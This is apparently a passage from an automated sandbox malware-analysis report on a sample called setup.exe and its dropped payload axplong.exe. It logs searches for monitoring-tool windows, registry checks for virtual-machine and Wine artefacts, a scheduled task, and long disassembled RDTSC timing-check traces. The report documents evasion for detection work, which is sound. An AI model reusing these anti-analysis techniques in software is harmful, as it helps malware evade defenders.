                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\setup.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3CEFED second address: 3CE8A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F808D4B80C7h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f or dword ptr [ebp+122D1C24h], ecx 0x00000015 push dword ptr [ebp+122D1401h] 0x0000001b jmp 00007F808D4B80C5h 0x00000020 call dword ptr [ebp+122D1850h] 0x00000026 pushad 0x00000027 mov dword ptr [ebp+122D1BC4h], ecx 0x0000002d xor eax, eax 0x0000002f sub dword ptr [ebp+122D2790h], edx 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 add dword ptr [ebp+122D1BC4h], eax 0x0000003f pushad 0x00000040 mov edx, 607D7F57h 0x00000045 mov dword ptr [ebp+122D193Bh], edi 0x0000004b popad 0x0000004c mov dword ptr [ebp+122D2A3Fh], eax 0x00000052 jmp 00007F808D4B80BBh 0x00000057 mov esi, 0000003Ch 0x0000005c sub dword ptr [ebp+122D1C5Ch], eax 0x00000062 add esi, dword ptr [esp+24h] 0x00000066 mov dword ptr [ebp+122D2790h], ecx 0x0000006c jno 00007F808D4B80B7h 0x00000072 lodsw 0x00000074 pushad 0x00000075 pushad 0x00000076 xor ebx, dword ptr [ebp+122D2AFFh] 0x0000007c add edx, 763E7B1Eh 0x00000082 popad 0x00000083 xor dword ptr [ebp+122D1C5Ch], ecx 0x00000089 popad 0x0000008a add eax, dword ptr [esp+24h] 0x0000008e jmp 00007F808D4B80BFh 0x00000093 or dword ptr [ebp+122D2790h], eax 0x00000099 mov ebx, dword ptr [esp+24h] 0x0000009d pushad 0x0000009e ja 00007F808D4B80BCh 0x000000a4 popad 0x000000a5 push eax 0x000000a6 jo 00007F808D4B80C8h 0x000000ac push eax 0x000000ad push edx 0x000000ae jng 00007F808D4B80B6h 0x000000b4 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 3CE8A1 second address: 3CE8A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 52E55D second address: 52E564 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 52E564 second address: 52E56A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54BBA5 second address: 54BBAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54BCCE second address: 54BCD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54BCD2 second address: 54BCD8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54BCD8 second address: 54BCE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D28052Bh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54BCE7 second address: 54BCEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54BCEB second address: 54BD02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jc 00007F808D280526h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54BD02 second address: 54BD08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54BE6B second address: 54BE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54BE78 second address: 54BE84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F808D4B80B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54C028 second address: 54C02C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54C412 second address: 54C41E instructions: 0x00000000 rdtsc 0x00000002 js 00007F808D4B80B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54C41E second address: 54C424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54C424 second address: 54C43F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C7h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54C43F second address: 54C443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54F7D1 second address: 54F7E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D4B80BEh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54F7E3 second address: 54F7E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54F7E7 second address: 54F813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a jnc 00007F808D4B80BCh 0x00000010 jo 00007F808D4B80B6h 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F808D4B80BEh 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54F813 second address: 54F832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F808D280530h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54F832 second address: 3CE8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jp 00007F808D4B80CEh 0x00000010 pop eax 0x00000011 mov ecx, 1BCE0BE9h 0x00000016 push dword ptr [ebp+122D1401h] 0x0000001c call dword ptr [ebp+122D1850h] 0x00000022 pushad 0x00000023 mov dword ptr [ebp+122D1BC4h], ecx 0x00000029 xor eax, eax 0x0000002b sub dword ptr [ebp+122D2790h], edx 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 add dword ptr [ebp+122D1BC4h], eax 0x0000003b pushad 0x0000003c mov edx, 607D7F57h 0x00000041 mov dword ptr [ebp+122D193Bh], edi 0x00000047 popad 0x00000048 mov dword ptr [ebp+122D2A3Fh], eax 0x0000004e jmp 00007F808D4B80BBh 0x00000053 mov esi, 0000003Ch 0x00000058 sub dword ptr [ebp+122D1C5Ch], eax 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 mov dword ptr [ebp+122D2790h], ecx 0x00000068 jno 00007F808D4B80B7h 0x0000006e lodsw 0x00000070 pushad 0x00000071 pushad 0x00000072 xor ebx, dword ptr [ebp+122D2AFFh] 0x00000078 add edx, 763E7B1Eh 0x0000007e popad 0x0000007f xor dword ptr [ebp+122D1C5Ch], ecx 0x00000085 popad 0x00000086 add eax, dword ptr [esp+24h] 0x0000008a jmp 00007F808D4B80BFh 0x0000008f or dword ptr [ebp+122D2790h], eax 0x00000095 mov ebx, dword ptr [esp+24h] 0x00000099 pushad 0x0000009a ja 00007F808D4B80BCh 0x000000a0 popad 0x000000a1 push eax 0x000000a2 jo 00007F808D4B80C8h 0x000000a8 push eax 0x000000a9 push edx 0x000000aa jng 00007F808D4B80B6h 0x000000b0 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54F877 second address: 54F90D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F808D28052Eh 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F808D280530h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F808D280528h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c mov dl, A3h 0x0000002e pushad 0x0000002f mov dword ptr [ebp+122D25FFh], edx 0x00000035 mov dword ptr [ebp+122D180Ah], ebx 0x0000003b popad 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push edx 0x00000041 call 00007F808D280528h 0x00000046 pop edx 0x00000047 mov dword ptr [esp+04h], edx 0x0000004b add dword ptr [esp+04h], 0000001Ah 0x00000053 inc edx 0x00000054 push edx 0x00000055 ret 0x00000056 pop edx 0x00000057 ret 0x00000058 mov dword ptr [ebp+122D2E2Bh], ecx 0x0000005e call 00007F808D280529h 0x00000063 jmp 00007F808D28052Bh 0x00000068 push eax 0x00000069 pushad 0x0000006a push edi 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54F90D second address: 54F947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop edi 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F808D4B80BAh 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 jp 00007F808D4B80CEh 0x0000001d jmp 00007F808D4B80C8h 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54F947 second address: 54F961 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F808D280528h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e je 00007F808D280530h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54F961 second address: 54FA04 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov edx, dword ptr [ebp+122D279Bh] 0x0000000d push 00000003h 0x0000000f mov cl, al 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F808D4B80B8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d js 00007F808D4B80BCh 0x00000033 sub edx, dword ptr [ebp+122D2A8Bh] 0x00000039 push 00000003h 0x0000003b mov dword ptr [ebp+122D367Fh], edx 0x00000041 push D413493Fh 0x00000046 jmp 00007F808D4B80BEh 0x0000004b xor dword ptr [esp], 1413493Fh 0x00000052 jmp 00007F808D4B80C1h 0x00000057 lea ebx, dword ptr [ebp+12454711h] 0x0000005d mov dword ptr [ebp+122D1C17h], edi 0x00000063 jmp 00007F808D4B80C0h 0x00000068 push eax 0x00000069 pushad 0x0000006a pushad 0x0000006b pushad 0x0000006c popad 0x0000006d jno 00007F808D4B80B6h 0x00000073 popad 0x00000074 push eax 0x00000075 push edx 0x00000076 jg 00007F808D4B80B6h 0x0000007c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54FA82 second address: 54FA87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54FA87 second address: 54FAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F808D4B80C8h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54FAAB second address: 54FAB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D28052Ah 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54FAB9 second address: 54FAF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D2B4Dh], edi 0x00000012 push 00000000h 0x00000014 sub dword ptr [ebp+122D1940h], ebx 0x0000001a call 00007F808D4B80B9h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push esi 0x00000024 pop esi 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54FAF2 second address: 54FAF8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54FC39 second address: 54FC3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54FC3F second address: 54FCE1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov si, cx 0x0000000c push 00000000h 0x0000000e mov edi, eax 0x00000010 jmp 00007F808D28052Dh 0x00000015 call 00007F808D280529h 0x0000001a pushad 0x0000001b push edx 0x0000001c jng 00007F808D280526h 0x00000022 pop edx 0x00000023 jbe 00007F808D280528h 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007F808D280536h 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 pushad 0x00000035 jnp 00007F808D28053Eh 0x0000003b jmp 00007F808D280538h 0x00000040 push edi 0x00000041 jmp 00007F808D280533h 0x00000046 pop edi 0x00000047 popad 0x00000048 mov eax, dword ptr [eax] 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d jmp 00007F808D280534h 0x00000052 pop eax 0x00000053 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54FCE1 second address: 54FCFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push edi 0x0000000e jg 00007F808D4B80BCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54FCFF second address: 54FD69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 jne 00007F808D28052Bh 0x0000000c add dx, 5114h 0x00000011 push 00000003h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F808D280528h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d jnl 00007F808D28052Ch 0x00000033 push 00000000h 0x00000035 jmp 00007F808D280538h 0x0000003a push 00000003h 0x0000003c push edx 0x0000003d mov dword ptr [ebp+122D1945h], ecx 0x00000043 pop edi 0x00000044 push ABAE2E9Eh 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e pop eax 0x0000004f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54FD69 second address: 54FD86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54FD86 second address: 54FDF3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007F808D280526h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 1451D162h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F808D280528h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov si, ax 0x00000030 mov dword ptr [ebp+122D37A5h], ebx 0x00000036 lea ebx, dword ptr [ebp+12454725h] 0x0000003c mov edi, dword ptr [ebp+122D2A97h] 0x00000042 mov esi, dword ptr [ebp+122D1940h] 0x00000048 xchg eax, ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F808D280539h 0x00000050 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54FDF3 second address: 54FDF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54FDF9 second address: 54FDFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54FDFD second address: 54FE16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jl 00007F808D4B80BCh 0x00000010 jo 00007F808D4B80B6h 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53D770 second address: 53D776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56DFD2 second address: 56DFD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56DFD8 second address: 56DFE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56DFE2 second address: 56DFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56E154 second address: 56E15E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F808D280526h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56E15E second address: 56E162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56E29B second address: 56E2C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F808D280526h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d jng 00007F808D280541h 0x00000013 jmp 00007F808D280535h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56E2C5 second address: 56E2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56E44F second address: 56E45E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F808D280526h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56E45E second address: 56E464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56EB5D second address: 56EB74 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F808D28052Fh 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56EB74 second address: 56EBAA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F808D4B80B6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F808D4B80BAh 0x00000017 pop edi 0x00000018 jmp 00007F808D4B80C9h 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56EBAA second address: 56EBB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56EBB0 second address: 56EBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56ED1F second address: 56ED3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D280537h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56EEBA second address: 56EED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56EED2 second address: 56EEDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56EEDC second address: 56EEE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56F166 second address: 56F16A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 563308 second address: 56330C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56330C second address: 563316 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F808D280526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 572316 second address: 572335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 572335 second address: 572339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 573C40 second address: 573C4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F808D4B80B6h 0x0000000a rdtsc
